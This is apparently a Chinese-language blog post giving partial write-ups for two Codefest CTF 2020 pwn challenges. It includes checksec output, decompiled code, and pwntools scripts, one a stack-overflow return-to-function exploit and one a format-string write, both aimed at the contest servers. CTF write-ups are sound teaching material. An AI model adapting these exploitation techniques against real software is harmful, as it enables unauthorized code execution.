Codefest CTF 2020 (部分wp)

由 admin 发布

C is hard

➜  ctf21 checksec source_fixed 
[*] '/home/yutian/ctf21/source_fixed'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v5; // [rsp-8h] [rbp-8h]

  __asm { endbr64 }
  puts_0("I will give you my secret if you can run my function", argv, envp);
  vuln((__int64)&v5);
  puts_0("This is not my function :", argv, v3);
  return 0;
}

vuln

.text:000000000040121A                 public vuln
.text:000000000040121A vuln            proc near               ; CODE XREF: main+19↓p
.text:000000000040121A ; __unwind {
.text:000000000040121A                 endbr64
.text:000000000040121E                 push    rbp
.text:000000000040121F                 mov     rbp, rsp
.text:0000000000401222                 sub     rsp, 20h
.text:0000000000401226                 lea     rax, [rbp-20h]
.text:000000000040122A                 mov     rdi, rax
.text:000000000040122D                 mov     eax, 0
.text:0000000000401232                 call    sub_4010B0
.text:0000000000401237                 nop
.text:0000000000401238                 leave
.text:0000000000401239                 retn
.text:0000000000401239 ; } // starts at 40121A
.text:0000000000401239 vuln            endp

print_flag

__int64 __usercall print_flag@<rax>(__int64 a1@<rbp>)
{
  __int64 v1; // ST08_8
  __int64 v3; // [rsp-8h] [rbp-8h]

  __asm { endbr64 }
  v3 = a1;
  v1 = sub_4010C0("flag.txt", &unk_402008);
  sub_4010A0(&flag, 64LL, v1);
  return sub_401090(" Thanks for running my function, here is my secret : %s%s%s", "\x1B[38;5;83m", &flag, "\x1B[0m");
}

exp

from pwn import *

#io = process("./source_fixed")
io = remote("chall.codefest.tech", 8782)
flag_addr = 0x04011B6
payload = cyclic(0x28) + p64(flag_addr) 

io.recvuntil("I will give you my secret if you can run my function")
io.sendline(payload)

io.interactive()

Take me to a cafe

exp

from pwn import *

# io = process("./format")
io = remote("chall.codefest.tech", 8745)
# context.log_level='debug'

c_addr = 0x0804C044

payload = p32(c_addr) + b'%51962d' + b'%4$n'
io.sendline(payload)
io.interactive()


暂无评论

发表评论